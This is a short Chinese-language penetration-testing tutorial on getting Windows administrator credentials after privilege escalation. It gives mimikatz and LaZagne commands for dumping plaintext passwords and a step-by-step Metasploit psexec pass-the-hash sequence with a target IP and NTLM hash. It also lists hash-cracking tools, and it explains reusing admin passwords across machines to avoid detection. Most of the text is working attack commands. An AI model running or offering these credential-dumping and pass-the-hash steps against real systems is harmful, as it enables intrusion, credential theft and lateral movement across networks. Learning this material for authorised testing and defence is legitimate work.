提權後期密碼安全性測試
雖然我們已經有了管理員權限,但是我們最好是有管理員密碼進行擴展攻擊,很多管理員賬號密碼都設置成一樣的,攻下一臺就可以拿下所有,同時遠程連接時,比如使用木馬,很容易被發現或者清理,如果用管理員賬號,可以清除滲透,也就是對操作系統和服務器不產生影響的情況下,尤其是正規滲透測試過程中,都是取得管理員賬號密碼,登錄3389端口或反端口連接者證明爲成功
簡單地說就是從 獲取管理員權限——>獲取管理員賬號
一、本地管理員密碼提取
本地管理員密碼如何直接提取
工具
lazagne
lazagne.exe/?>>1.txt
mimikatz(巴西烤肉)
第一條:
privilege::debug
//提升權限
第二條:
sekurlsa::logonpa
ssWords //抓取密碼
二、本地Hash遠程直接登錄
遇到高版本的系統,密碼不是明文的情況下,我們通過哈希值來取得管理員賬號
主要通過MSF提供的exploit/windows/smb/psexec模塊來完成。
msf >use exploit/windows/smb/psexec
msf >set RHOST 192.168.1.109
msf >set SMBUser administrator(管理員賬號名稱)
msf >set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4(哈希值 從500: 開始 到::: 結束)
msf >exploit
msf >shell
show targets
查看攻擊目標
show options
查看配置選項
三、hash密鑰暴力破解
一、通過LC5暴力破解Hash密碼
使用gmer直接提權SAM和system文件或用Pwdump7提取hash,最後使用LC5破解。
二、使用Ophcrack破解系統Hash密碼
http://simeon.blog.51cto.com/18680/122160
三、在線破解